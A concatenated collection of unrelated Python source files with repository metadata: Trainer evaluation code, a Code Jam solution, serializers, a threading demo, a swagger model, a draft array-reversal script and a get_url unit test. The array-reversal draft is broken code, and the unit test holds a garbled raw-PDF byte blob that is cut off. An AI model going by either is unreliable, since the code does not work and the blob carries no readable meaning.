You can also subclass and override this method to inject custom behavior. Args: eval_dataset (:obj:`Dataset`, `optional`): Pass a dataset if you wish to override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. It must implement the :obj:`__len__` method. Returns: A dictionary containing the evaluation loss and the potential metrics computed from the predictions. The dictionary also contains the epoch number which comes from the training state. """ if eval_dataset is not None and not isinstance(eval_dataset, collections.abc.Sized): raise ValueError("eval_dataset must implement __len__") eval_dataloader = self.get_eval_dataloader(eval_dataset) output = self.prediction_loop( eval_dataloader, description="Evaluation", # No point gathering the predictions if there are no metrics, otherwise we defer to # self.args.prediction_loss_only prediction_loss_only=True if self.compute_metrics is None else None, ) self.log(output.metrics) if self.args.tpu_metrics_debug or self.args.debug: # tpu-comment: Logging debug metrics for PyTorch/XLA (compile, execute times, ops, etc.) xm.master_print(met.metrics_report()) self.control = self.callback_handler.on_evaluate(self.args, self.state, self.control, output.metrics) return output.metrics def predict(self, test_dataset: Dataset) -> PredictionOutput: """ Run prediction and returns predictions and potential metrics. Depending on the dataset and your use case, your test dataset may contain labels. In that case, this method will also return metrics, like in :obj:`evaluate()`. Args: test_dataset (:obj:`Dataset`): Dataset to run the predictions on. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. Has to implement the method :obj:`__len__` .. 
note:: If your predictions or labels have different sequence length (for instance because you're doing dynamic padding in a token classification task) the predictions will be padded (on the right) to allow for concatenation into one array. The padding index is -100. Returns: `NamedTuple` A namedtuple with the following keys: - predictions (:obj:`np.ndarray`): The predictions on :obj:`test_dataset`. - label_ids (:obj:`np.ndarray`, `optional`): The labels (if the dataset contained some). - metrics (:obj:`Dict[str, float]`, `optional`): The potential dictionary of metrics (if the dataset contained labels). """ if test_dataset is not None and not isinstance(test_dataset, collections.abc.Sized): raise ValueError("test_dataset must implement __len__") test_dataloader = self.get_test_dataloader(test_dataset) return self.prediction_loop(test_dataloader, description="Prediction") def prediction_loop( self, dataloader: DataLoader, description: str, prediction_loss_only: Optional[bool] = None ) -> PredictionOutput: """ Prediction/evaluation loop, shared by :obj:`Trainer.evaluate()` and :obj:`Trainer.predict()`. Works both with or without labels. """ if hasattr(self, "_prediction_loop"): warnings.warn( "The `_prediction_loop` method is deprecated and won't be called in a future version, define `prediction_loop` in your subclass.", FutureWarning, ) return self._prediction_loop(dataloader, description, prediction_loss_only=prediction_loss_only) if not isinstance(dataloader.dataset, collections.abc.Sized): raise ValueError("dataset must implement __len__") prediction_loss_only = ( prediction_loss_only if prediction_loss_only is not None else self.args.prediction_loss_only ) model = self.model # multi-gpu eval if self.args.n_gpu > 1: model = torch.nn.DataParallel(model) # Note: in torch.distributed mode, there's no point in wrapping the model # inside a DistributedDataParallel as we'll be under `no_grad` anyways. 
batch_size = dataloader.batch_size num_examples = self.num_examples(dataloader) logger.info("***** Running %s *****", description) logger.info(" Num examples = %d", num_examples) logger.info(" Batch size = %d", batch_size) losses_host: torch.Tensor = None preds_host: Union[torch.Tensor, List[torch.Tensor]] = None labels_host: Union[torch.Tensor, List[torch.Tensor]] = None world_size = 1 if is_torch_tpu_available(): world_size = xm.xrt_world_size() elif self.args.local_rank != -1: world_size = torch.distributed.get_world_size() world_size = max(1, world_size) eval_losses_gatherer = DistributedTensorGatherer(world_size, num_examples, make_multiple_of=batch_size) if not prediction_loss_only: preds_gatherer = DistributedTensorGatherer(world_size, num_examples) labels_gatherer = DistributedTensorGatherer(world_size, num_examples) model.eval() if is_torch_tpu_available(): dataloader = pl.ParallelLoader(dataloader, [self.args.device]).per_device_loader(self.args.device) if self.args.past_index >= 0: self._past = None self.callback_handler.eval_dataloader = dataloader for step, inputs in enumerate(dataloader): loss, logits, labels = self.prediction_step(model, inputs, prediction_loss_only) if loss is not None: losses = loss.repeat(batch_size) losses_host = losses if losses_host is None else torch.cat((losses_host, losses), dim=0) if logits is not None: preds_host = logits if preds_host is None else nested_concat(preds_host, logits, padding_index=-100) if labels is not None: labels_host = labels if labels_host is None else nested_concat(labels_host, labels, padding_index=-100) self.control = self.callback_handler.on_prediction_step(self.args, self.state, self.control) # Gather all tensors and put them back on the CPU if we have done enough accumulation steps. 
if self.args.eval_accumulation_steps is not None and (step + 1) % self.args.eval_accumulation_steps == 0: eval_losses_gatherer.add_arrays(self._gather_and_numpify(losses_host, "eval_losses")) if not prediction_loss_only: preds_gatherer.add_arrays(self._gather_and_numpify(preds_host, "eval_preds")) labels_gatherer.add_arrays(self._gather_and_numpify(labels_host, "eval_label_ids")) # Set back to None to begin a new accumulation losses_host, preds_host, labels_host = None, None, None if self.args.past_index and hasattr(self, "_past"): # Clean the state at the end of the evaluation loop delattr(self, "_past") # Gather all remaining tensors and put them back on the CPU eval_losses_gatherer.add_arrays(self._gather_and_numpify(losses_host, "eval_losses")) if not prediction_loss_only: preds_gatherer.add_arrays(self._gather_and_numpify(preds_host, "eval_preds")) labels_gatherer.add_arrays(self._gather_and_numpify(labels_host, "eval_label_ids")) eval_loss = eval_losses_gatherer.finalize() preds = preds_gatherer.finalize() if not prediction_loss_only else None label_ids = labels_gatherer.finalize() if not prediction_loss_only else None if self.compute_metrics is not None and preds is not None and label_ids is not None: metrics = self.compute_metrics(EvalPrediction(predictions=preds, label_ids=label_ids)) else: metrics = {} if eval_loss is not None: metrics["eval_loss"] = eval_loss.mean().item() # Prefix all keys with eval_ for key in list(metrics.keys()): if not key.startswith("eval_"): metrics[f"eval_{key}"] = metrics.pop(key) return PredictionOutput(predictions=preds, label_ids=label_ids, metrics=metrics) def _gather_and_numpify(self, tensors, name): """ Gather value of `tensors` (tensor or list/tuple of nested tensors) and convert them to numpy before concatenating them to `gathered` """ if tensors is None: return if is_torch_tpu_available(): tensors = nested_xla_mesh_reduce(tensors, name) elif self.args.local_rank != -1: tensors = distributed_concat(tensors) return 
nested_numpify(tensors) def prediction_step( self, model: nn.Module, inputs: Dict[str, Union[torch.Tensor, Any]], prediction_loss_only: bool ) -> Tuple[Optional[float], Optional[torch.Tensor], Optional[torch.Tensor]]: """ Perform an evaluation step on :obj:`model` using obj:`inputs`. Subclass and override to inject custom behavior. Args: model (:obj:`nn.Module`): The model to evaluate. inputs (:obj:`Dict[str, Union[torch.Tensor, Any]]`): The inputs and targets of the model. The dictionary will be unpacked before being fed to the model. Most models expect the targets under the argument :obj:`labels`. Check your model's documentation for all accepted arguments. prediction_loss_only (:obj:`bool`): Whether or not to return the loss only. Return: Tuple[Optional[float], Optional[torch.Tensor], Optional[torch.Tensor]]: A tuple with the loss, logits and labels (each being optional). """ has_labels = all(inputs.get(k) is not None for k in self.label_names) inputs = self._prepare_inputs(inputs) with torch.no_grad(): if self.args.fp16 and _use_native_amp: with autocast(): outputs = model(**inputs) else: outputs = model(**inputs) if has_labels: loss = outputs[0].mean().detach() logits = outputs[1:] else: loss = None # Slicing so we get a tuple even if `outputs` is a `ModelOutput`. logits = outputs[:] if self.args.past_index >= 0: self._past = outputs[self.args.past_index if has_labels else self.args.past_index - 1] # Remove the past from the logits. 
logits = logits[: self.args.past_index - 1] + logits[self.args.past_index :] if prediction_loss_only: return (loss, None, None) logits = nested_detach(logits) if len(logits) == 1: logits = logits[0] if has_labels: labels = nested_detach(tuple(inputs.get(name) for name in self.label_names)) if len(labels) == 1: labels = labels[0] else: labels = None return (loss, logits, labels) def floating_point_ops(self, inputs: Dict[str, Union[torch.Tensor, Any]]): """ For models that inherit from :class:`~transformers.PreTrainedModel`, uses that method to compute the number of floating point operations for every backward + forward pass. If using another model, either implement such a method in the model or subclass and override this method. Args: inputs (:obj:`Dict[str, Union[torch.Tensor, Any]]`): The inputs and targets of the model. Returns: :obj:`int`: The number of floating-point operations. """ model = self._actual_model(self.model) if hasattr(model, "floating_point_ops"): return model.floating_point_ops(inputs) else: return 0 @staticmethod def _actual_model( model: Union[torch.nn.DataParallel, torch.nn.parallel.DistributedDataParallel, torch.nn.modules.Module] ) -> torch.nn.modules.Module: """ Args: model: (:obj:`Union[torch.nn.DataParallel, torch.nn.parallel.DistributedDataParallel, torch.nn.modules.Module]`): Model object used during training Returns: :obj:`torch.nn.modules.Module`: unwrapped module """ if isinstance(model, torch.nn.DataParallel) or isinstance(model, torch.nn.parallel.DistributedDataParallel): model = model.module else: model = model return model
efdbbaf125546b22e79da1e189dd44d713d68223
487ce91881032c1de16e35ed8bc187d6034205f7
/codes/CodeJamCrawler/16_0_2_neat/16_0_2_jolley_Pancakes.py
0f7c8e1f03d564dbbb9de3c313d22706fa0aea19
[]
no_license
DaHuO/Supergraph
9cd26d8c5a081803015d93cf5f2674009e92ef7e
c88059dc66297af577ad2b8afa4e0ac0ad622915
refs/heads/master
2021-06-14T16:07:52.405091
2016-08-21T13:39:13
2016-08-21T13:39:13
49,829,508
2
0
null
2021-03-19T21:55:46
2016-01-17T18:23:00
Python
UTF-8
Python
false
false
972
py
# -*- coding: utf-8 -*- """ Created on Sat Apr 9 18:01:19 2016 @author: jo """ with open('input', 'r') as f: cases = 0 case = 0 with open('outputPan', 'w') as fo: for line in f: if line[0].isdigit(): cases = int(line) #print(line) else: case +=1 last = True flips = 0 for c in xrange(len(line)): positive = True if line[c] == '-': positive = False if c == 0: last = positive else: if positive != last: flips +=1 if c == (len(line)-1): if positive != True: flips += 1 fo.write('Case #' + str(case) + ': ' + str(flips) + '\n') last = positive
b59c437e9488ef3d05b937ed48797e71bc060614
fe54d59a1a030a9c1395f4f4d3ef2e2b2ec48343
/build/lib/nailgun/objects/serializers/node.py
a2db68ad18b2230ba9ca3569cf67682031e2d880
[]
no_license
zbwzy/nailgun
38a4198a0630a1608c14e55bee03b5ed04ded3e8
2eaeece03ebc53f48791db2aa8e7d24c010910f2
refs/heads/master
2022-09-25T09:03:33.296368
2016-02-23T09:32:55
2016-02-23T09:32:55
52,345,460
0
0
null
2022-09-16T17:45:43
2016-02-23T09:03:07
Python
UTF-8
Python
false
false
2,488
py
# -*- coding: utf-8 -*- # Copyright 2013 Mirantis, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nailgun import consts from nailgun.objects.serializers.base import BasicSerializer class NodeSerializer(BasicSerializer): fields = ( 'id', 'name', 'meta', 'progress', 'kernel_params', 'roles', 'pending_roles', 'status', 'mac', 'fqdn', 'ip', 'manufacturer', 'platform_name', 'pending_addition', 'pending_deletion', 'os_platform', 'error_type', 'online', 'cluster', 'network_data', 'group_id', 'node_type' ) class NodeInterfacesSerializer(BasicSerializer): nic_fields = ( 'id', 'mac', 'name', 'type', 'state', 'current_speed', 'max_speed', 'assigned_networks' ) bond_fields = ( 'mac', 'name', 'type', 'mode', 'state', 'assigned_networks' ) @classmethod def serialize_nic_interface(cls, instance, fields=None): return BasicSerializer.serialize( instance, fields=fields if fields else cls.nic_fields ) @classmethod def serialize_bond_interface(cls, instance, fields=None): data_dict = BasicSerializer.serialize( instance, fields=fields if fields else cls.bond_fields ) data_dict['slaves'] = [{'name': slave.name} for slave in instance.slaves] return data_dict @classmethod def serialize(cls, instance, fields=None): iface_types = consts.NETWORK_INTERFACE_TYPES if instance.type == iface_types.ether: return cls.serialize_nic_interface(instance) elif instance.type == iface_types.bond: return cls.serialize_bond_interface(instance)
eeb5c32aeca4c54f2b5c6ffc35714485bb235f96
7174b27cd79cad398ffa1add9b59da6e9adbeae4
/python-100days/day0-15/day13/more_thread2.py
35152bd4993d043a4da4ce465dc7221aa7d7ba44
[]
no_license
UULIN/py
ddf037021afce04e46d51c133bfa06257ef7200a
a5d32597fc91fbd5ec41f54fb942c82300766299
refs/heads/master
2021-07-18T08:20:49.342072
2020-10-21T14:41:42
2020-10-21T14:41:42
222,977,134
1
0
null
null
null
null
UTF-8
Python
false
false
1,226
py
from time import sleep from threading import Thread, Lock class Account(object): def __init__(self): self._balance = 0 self._lock = Lock() def deposit(self, money): self._lock.acquire() try: # 计算存款后的余额 new_balance = self._balance + money # 模拟受理存款业务需要0.01秒的时间 sleep(0.01) # 修改账户余额 self._balance = new_balance finally: self._lock.release() @property def balance(self): return self._balance class AddMoneyThread(Thread): def __init__(self, account, money): super().__init__() self._account = account self._money = money def run(self): self._account.deposit(self._money) def main(): account = Account() threads = [] # 创建100个存款的线程向同一个账户中存钱 for _ in range(100): t = AddMoneyThread(account, 1) threads.append(t) t.start() # 等所有存款的线程都执行完毕 for t in threads: t.join() print('账户余额为: ¥%d元' % account.balance) if __name__ == '__main__': main()
ae02b14171429a5182162ab7f4da4271b917afb0
5f6c16e89cf58304c2e70f1e34f14110fcec636c
/python-swagger-sdk/swagger_client/models/inline_response2006.py
07fbec9fdc5ad9c1c909603b3c658606843c2559
[]
no_license
mohammedpatla/secretapi
481c97901a5e92ca02e29470ab683df80ea0f26a
df420498bd0ae37fd1a152c3877a1342275a8f43
refs/heads/master
2022-12-25T01:55:18.038954
2020-10-04T23:13:54
2020-10-04T23:13:54
null
0
0
null
null
null
null
UTF-8
Python
false
false
8,041
py
# coding: utf-8 """ API for Secret Network by ChainofSecrets.org A REST interface for state queries, transaction generation and broadcasting. # noqa: E501 OpenAPI spec version: 3.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six class InlineResponse2006(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'inflation_rate_change': 'str', 'inflation_max': 'str', 'inflation_min': 'str', 'goal_bonded': 'str', 'unbonding_time': 'str', 'max_validators': 'int', 'bond_denom': 'str' } attribute_map = { 'inflation_rate_change': 'inflation_rate_change', 'inflation_max': 'inflation_max', 'inflation_min': 'inflation_min', 'goal_bonded': 'goal_bonded', 'unbonding_time': 'unbonding_time', 'max_validators': 'max_validators', 'bond_denom': 'bond_denom' } def __init__(self, inflation_rate_change=None, inflation_max=None, inflation_min=None, goal_bonded=None, unbonding_time=None, max_validators=None, bond_denom=None): # noqa: E501 """InlineResponse2006 - a model defined in Swagger""" # noqa: E501 self._inflation_rate_change = None self._inflation_max = None self._inflation_min = None self._goal_bonded = None self._unbonding_time = None self._max_validators = None self._bond_denom = None self.discriminator = None if inflation_rate_change is not None: self.inflation_rate_change = inflation_rate_change if inflation_max is not None: self.inflation_max = inflation_max if inflation_min is not None: self.inflation_min = inflation_min if goal_bonded is not None: self.goal_bonded = goal_bonded if unbonding_time is not None: self.unbonding_time = unbonding_time if max_validators is not None: self.max_validators = max_validators if bond_denom is not None: 
self.bond_denom = bond_denom @property def inflation_rate_change(self): """Gets the inflation_rate_change of this InlineResponse2006. # noqa: E501 :return: The inflation_rate_change of this InlineResponse2006. # noqa: E501 :rtype: str """ return self._inflation_rate_change @inflation_rate_change.setter def inflation_rate_change(self, inflation_rate_change): """Sets the inflation_rate_change of this InlineResponse2006. :param inflation_rate_change: The inflation_rate_change of this InlineResponse2006. # noqa: E501 :type: str """ self._inflation_rate_change = inflation_rate_change @property def inflation_max(self): """Gets the inflation_max of this InlineResponse2006. # noqa: E501 :return: The inflation_max of this InlineResponse2006. # noqa: E501 :rtype: str """ return self._inflation_max @inflation_max.setter def inflation_max(self, inflation_max): """Sets the inflation_max of this InlineResponse2006. :param inflation_max: The inflation_max of this InlineResponse2006. # noqa: E501 :type: str """ self._inflation_max = inflation_max @property def inflation_min(self): """Gets the inflation_min of this InlineResponse2006. # noqa: E501 :return: The inflation_min of this InlineResponse2006. # noqa: E501 :rtype: str """ return self._inflation_min @inflation_min.setter def inflation_min(self, inflation_min): """Sets the inflation_min of this InlineResponse2006. :param inflation_min: The inflation_min of this InlineResponse2006. # noqa: E501 :type: str """ self._inflation_min = inflation_min @property def goal_bonded(self): """Gets the goal_bonded of this InlineResponse2006. # noqa: E501 :return: The goal_bonded of this InlineResponse2006. # noqa: E501 :rtype: str """ return self._goal_bonded @goal_bonded.setter def goal_bonded(self, goal_bonded): """Sets the goal_bonded of this InlineResponse2006. :param goal_bonded: The goal_bonded of this InlineResponse2006. 
# noqa: E501 :type: str """ self._goal_bonded = goal_bonded @property def unbonding_time(self): """Gets the unbonding_time of this InlineResponse2006. # noqa: E501 :return: The unbonding_time of this InlineResponse2006. # noqa: E501 :rtype: str """ return self._unbonding_time @unbonding_time.setter def unbonding_time(self, unbonding_time): """Sets the unbonding_time of this InlineResponse2006. :param unbonding_time: The unbonding_time of this InlineResponse2006. # noqa: E501 :type: str """ self._unbonding_time = unbonding_time @property def max_validators(self): """Gets the max_validators of this InlineResponse2006. # noqa: E501 :return: The max_validators of this InlineResponse2006. # noqa: E501 :rtype: int """ return self._max_validators @max_validators.setter def max_validators(self, max_validators): """Sets the max_validators of this InlineResponse2006. :param max_validators: The max_validators of this InlineResponse2006. # noqa: E501 :type: int """ self._max_validators = max_validators @property def bond_denom(self): """Gets the bond_denom of this InlineResponse2006. # noqa: E501 :return: The bond_denom of this InlineResponse2006. # noqa: E501 :rtype: str """ return self._bond_denom @bond_denom.setter def bond_denom(self, bond_denom): """Sets the bond_denom of this InlineResponse2006. :param bond_denom: The bond_denom of this InlineResponse2006. 
# noqa: E501 :type: str """ self._bond_denom = bond_denom def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(InlineResponse2006, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, InlineResponse2006): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
eccf709bc85d1da00c645964d906df42ca0dd0af
52b5773617a1b972a905de4d692540d26ff74926
/.history/reverseA_20200714202827.py
c8528cea3532a5e29a64703e1b1f20412489e57a
[]
no_license
MaryanneNjeri/pythonModules
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
f4e56b1e4dda2349267af634a46f6b9df6686020
refs/heads/master
2022-12-16T02:59:19.896129
2020-09-11T12:05:22
2020-09-11T12:05:22
null
0
0
null
null
null
null
UTF-8
Python
false
false
282
py
''' Given array A consisting of N integers, return the reversed array ''' def array(arr): i = 0 j = len(arr)-1 while i < len(arr)-2 and j > 0: temp = arr[i] arr[i] = arr[j] arr[j] = temp i +=1 j -=1 arr([1, 2, 3, 4, 5, 6])
c2901094b0c4b4a53907e0010cd8c43666a720bb
c9500ad778b8521aaa85cb7fe3239989efaa4799
/plugins/get_url/unit_test/test_get_file.py
1b7ecf108a88e562d02711af4289979fc0778ff2
[ "MIT" ]
permissive
rapid7/insightconnect-plugins
5a6465e720f114d71b1a82fe14e42e94db104a0b
718d15ca36c57231bb89df0aebc53d0210db400c
refs/heads/master
2023-09-01T09:21:27.143980
2023-08-31T10:25:36
2023-08-31T10:25:36
190,435,635
61
60
MIT
2023-09-14T08:47:37
2019-06-05T17:05:12
Python
UTF-8
Python
false
false
37,536
py
import os import sys from unit_test.util import Util sys.path.append(os.path.abspath("../")) from unittest import TestCase from komand_get_url.actions.get_file import GetFile from komand_get_url.actions.get_file.schema import Input from unittest.mock import patch from insightconnect_plugin_runtime.exceptions import PluginException sys.path.append(os.path.abspath("../")) @patch("urllib.request.urlopen", side_effect=Util.mocked_request) @patch("insightconnect_plugin_runtime.helper.open_cachefile", side_effect=Util.mock_for_cache_creation) @patch("komand_get_url.util.utils.Utils.create_url_meta_file") class TestGetFile(TestCase): @classmethod def setUpClass(cls) -> None: cls.action = Util.default_connector(GetFile()) def test_get_pdf_file(self, mock_get, mock_create_url, mock_cach): actual = self.action.run({Input.URL: "https://test.com/v1/test.pdf", Input.IS_VERIFY: False}) expected = { "bytes": "%PDF-1.5
%����
3 0 obj
<< /Linearized 1 /L 15007 /H [ 678 125 ] /O 7 /E 14477 /N 1 /T 14726 >>
endobj
                                                                                                                 
4 0 obj
<< /Type /XRef /Length 50 /Filter /FlateDecode /DecodeParms << /Columns 4 /Predictor 12 >> /W [ 1 2 1 ] /Index [ 3 14 ] /Info 1 0 R /Root 5 0 R /Size 17 /Prev 14727                 /ID [<4dac181eb10e569cb7930abd3bbd36e1><f8f4a6b9f7562a333372614367963140>] >>
stream
x�cbd�g`b`8	$��XF@���*��	=��.�w 	F4 �.
endstream
endobj
                                                                     
5 0 obj
<< /Pages 14 0 R /Type /Catalog >>
endobj
6 0 obj
<< /Filter /FlateDecode /S 36 /Length 48 >>
stream
x�c```e``Z� �Yp e31B�����R���v�a  ���
endstream
endobj
7 0 obj
<< /Contents 8 0 R /MediaBox [ 0 0 595.276 841.89 ] /Parent 14 0 R /Resources 12 0 R /Type /Page >>
endobj
8 0 obj
<< /Filter /FlateDecode /Length 118 >>
stream
x�mͻ�0F�=O�b��iV$��C����P���S.#�w��1�ڡP��KO6t��3CY�Cw[�2tO�=E
 �����Bu��M���4����!$ePH�^�� or[s/��"�
endstream
endobj
9 0 obj
<< /Filter /FlateDecode /Length1 1578 /Length2 10778 /Length3 0 /Length 11818 >>
stream
x���T�۲-�5�KC�������@h�qN�	�����]��#{�{�>���xo0F�ͪY��j�Z��Lb��@i0����� ����
`e�`feeG���A��2#Sk�]@`�$��f�W��䕧� Ȼ��8 l��l<��� vVV��!:8�$��@� %f���L-���������?� :z �_� 1{�3��P2�� �_O�0�h8X����JA'h�8򳰸��3�ٻ0;8[�3�A�:�����i�lf��3fdj����o������x5؁,�`��W�%��z8@CN���MV�����l l�l�N���?�@࿂�,,���� �5�
d�H+2C< � 3�������k���������W�f i15��k��j����qav��i��O��)K�-%��`���$A�@�ױ{��}���`�+���O���,Z`��+PN�_�W�l�@������� t =,lX����t��d�c~������`���d|����b�@�]����t�7BfcX�,  s�5����f������A �W��X������U^�`;�����_i9=u��;��O\������
`b�b������Q5����ʁ� |W�:�����_���r��;��ëj� ���ܐ��������Y����)�O�����wAҮvv������f� ;�^E�
y] %��5 �o���UZ�\���Wb��b`k���"� Z�� 6��o�֟-����.�?�
���j���u�,>�>.����|ݜ�>R
l�`�g�ع�f��f�ȯ���� �l��h	��K� f��5�ڞ/����ύ�� X����B*`��d� ��,V���^ ��? '���ߐ��y:ڼ>&�a����`��|�0�Ȝ| ��G�����_Os�Gi��{��kZ��ί�_z~���^' �h��8�`!l[�r[%F�δ=&4M���J�����z���D_���|-�4؅��)Ew%�D��}�X��)A�����$N}r�ya�o<�P�{/)	���ϓ��v��F�vy�\'W^t�/ط�=2�{K�GB��v*�PK����"��P�g�P�C�H�c�y�������!��c@�=��(��_g����Z-�dw� �"�' �������K�ǟ�.*X�[�h, �AcLYa�`�cϨ�G�뻫�F�ضr� ���}�[	���8&Δ*���&ؐj�@ҽ6+�Ֆk�N+��%���/�4=�C��N�Z����>��Д������N_�o"�"$��l�l�W��3HS�J �o:t�r8�KnI��pf!�ށ���Dl�����p��#$'\�>�Ѿ�ug�m�3��v�XFA/A��/��)gg��6R���tyR���~�Ъ	� �f�JX����%�=��7����
8�d���+�=m���2�h�k5�r}U��:�`ݫ
�Ỷ�۸.-7��wо;+w�������M�?��E%MF,�M���l7���cMq7
����:�B������%r�Դ�J�
���|�$�	��E�>_���״���A�fb�FSg�,ü3i��>&'�м���k�{~jt�bxr��ۮ��gO@�+2�.��b~�?�rM�.2��*�᧖�X�Iu�Lp�h`V�B++��ؑ, ��6�b��\B��W��=yL�P��a�O�+��R!�=h�5I�0����G)�<5p)qz8���z.1�b~Y�
�� ;��f�=E�U�n ��f"Ԧ�,-�@ML�:�*�TE05&-������Jf�Ş	�1(yH	M�7|,w5� ���9�Y����!t�ykwJi���s�0*�ʗ 5��ݱ�Iӏ?���X�}�^���Ok��2ڜ��^+��G�����$4��I>�C1Ʌ3Hj���P�d�%�����B-�E�Nkl�uVpe��xHג������B�k&�}�=	��?Z�Q�9��65�p�p�Qd���5}�:�^��۷cAĺFZz�$����Z6��ͽF�8gx�x��4�N�A(t���9�����@p0H�Ɉ/3��m&�/.�݊LF�L��@�ͮ�:��R�-�JEe��_�����n�Ap8���'B$T��a��N4���t#?B�����Q������k|Z�������z��J'_��Ǌ�Dz�*$�Y����2<�΁�ӈoF���~ �k��&�P�Z*J4d�-�\ύ��{���:Q(ZNUl;~�b�f���}L�ߩ���uGu|7q��O�S�>9�����/v#���5@�ɓ����[׽<q�ix|�:6tądK��O����� Ri��`E0�ƅ;M1��tUe���m��� m���S�ܣ��}���
 =�F��b�TW�A3@�tt`�#Z�3ZN�_n�bNͺ�
���4��'/a-���;ˮ�ZU�=��L[�^C\�eG���D"[���M��@��p
ݻ�]8�4|<%bT*T0����C<fg�&>ݖ���s�g?%��̵g��V4�-��n���j��3H69��
�aK��9y�O�wi�o���'dz��V`��^���#������J�J)��+����1:�$������+� BƼӀ��Nձ��
Z����aJZU���Za'�=na	L�t��0��/��V�i��\���!��������l�\��c�#M켉o�j7s�&�V��D�k�fn�^�Z��&U9�8}��ld�K����*c����C�WKF���8�����ZFæ�Ѱ*T�U��A�-���sdAGݡ!�9B�B뢔���
ҷ�y��qm��vtv��YK�S�Q�{%�ɳÆ����8���F>J�6���� �]�?q��� �{�u""����#Q��"4��<+qF	/�R�,��$��G%�z�I[�&������$�#�Rw!���}�:��-&F0����s���nݭ��|-������vM�� �3!n:	�8�d�M�%�����%&[0�����|a��Ѹ�
as-/�Bug6�����n��`��(�lH$GjVQz)�(�>n�
0�8�{b�m� �rIU���%�b�䘬4&����:���#C��Ǟ<a3]�ue�te8�\���8c�����Fvh�\���`Mu	Ĝ ��a��?��KYX?��E�yh{^�-aNfQ���H������-�44.�z����Y��3.�AO�\���Rb)�j���*��i��3	v��t�(�ʗ���
,�˺����1�޷���%m�bc���t�	��ĠIH��h��Yo��UK�.pPm�٘��*�m����h�Q��;ҏr��Mk�YN�v伤sǯ�Xp4�2}՟XO.
o��iL��B���Ul煲C5îs�]��w��g��u�R�0{hT���4��*K��gI�Z5R�`��ZR�����&�yԞ�2���䫒iP~���w�&��JD���#炌���^�c='�oK�	jA�͂�'����c��ZR_�.�#Ϧ�:f��F���	C뫉���[\�P�zI��0(���i{̵g�V����,�u���>��u��YKc���`���P�E�kvs�'ґ��I���֖ό?d���|�;6U��j��l���������q���Ҵ�3�7[*�����ˉKNW��X�}Z�P�͐�ՙC���w��
"��y�7�"������S�V|0ʺ�c���j�%Ӥ�u��L���c;,V�[;lT�Ə��{�̃=�?����<�܂��Ԉ{U}�	��.�6ӂ����j�S�.��W
^��|{���O��Ȉ�<��Hz��F�Crޤ���9���% �'g�Q���ՇK'���ݟK���Zݪzp�ˆ��� �<�
,ː��`�aSr���Z�|ܹ�%kH9]j ˖<�vl��|�W�(��#�,�tY��s�Ú�w��#:Dؠb�w4Aƥ�!��\��ψ�&��޳�TG�6�o�u�S�أ.nL�.nf�~���$w^/���K�[%����2�i8vts��:b��������<
ߟ��'��4:$�%[sj��T�k�vߎ@���[��f��H�E�����&���+]�hm*��1e8&E4prD���O<c��ek�����x}1Q�dU�E
�~�q{~t��W�5 '�ٵ�9ƅ�~����uWWp�%��AH�j�xſ����=��(�$E�*3$0ք����&��?�&m�Y6�@�`�1xa�5 b�(�����%JAv���q�*ي��b��`� ������8�F�}��T>Yii(8Ɏ�|��
��	8���b�̥������^^�i.�\���8]������۳���G0I1���tt uG1-�8��]4�C�@�gQ U�pD��!$�8"gD��vxw9݄i�>b��hS�Ǵ�Q���ӌ���'S<;!@�Eb[<���"����6IG�|�'���T?()k��Ʀ�3n��J2�s����\ee�����%����w��K�U�Xz��-i����z�/�rP��4ɂ/p-�'�@70/v@�t ��vu	G�Y���g�&��4N��W�3��@�q��ϿX�|9֒3��7)e��1�wi��\&f�uu��|����zꢌQ�g�mG�)d�N#Td_G��M�~D�}����ېop�C�	0Zy�L��P�v�V�F$�+M0X�����x���\4�� )ݬ�֟	'M��"<t��A�V��"���ۻe��	�����)���7�
�&Z9��'��j���Ǽ�iծ�#��/�R���Bc�f{�(6�*`L��O26o�Q�y]=W��/�W/�\��|-���:=?R<��f��v�k1�C�Ar�w@���m*!=�t&@��}Ri��g�	x<�2׽�&��_�=^A�!����1Z�nPdh^�����Q���ʚ?8�*t�EZ�q��o�9�oHA��+�V�AOԙ3���h��홱hG56�$�G�<�	x��]�I|/�߯3�Q)��e"��p[��V���9��5�q�������f� )��ϰcUb�gCEz_�m$z�tg�`<�(�p-�U
�����%��t*V�a%���	r-��Z��h�<=���s��'���揉Z�$CP/�Y$�A0Q�Jbq�7��J��l6��f��� j��)�c�h*��Rm�[&�P	2�x�A����V�.����K�[�\�E���YU�����xW�{�^C�S�>���n�x~o&[�E���"������V��l�9��J�^mz��7�	K��䃩�YV� Z�A�X8��TۈT��.w�N�#32b�<�Ѕ�Y0>���P������m�^?��;�:?�Ҷ��\�SY��ѽ�+�D�.#���"�vy���'i�>��*�
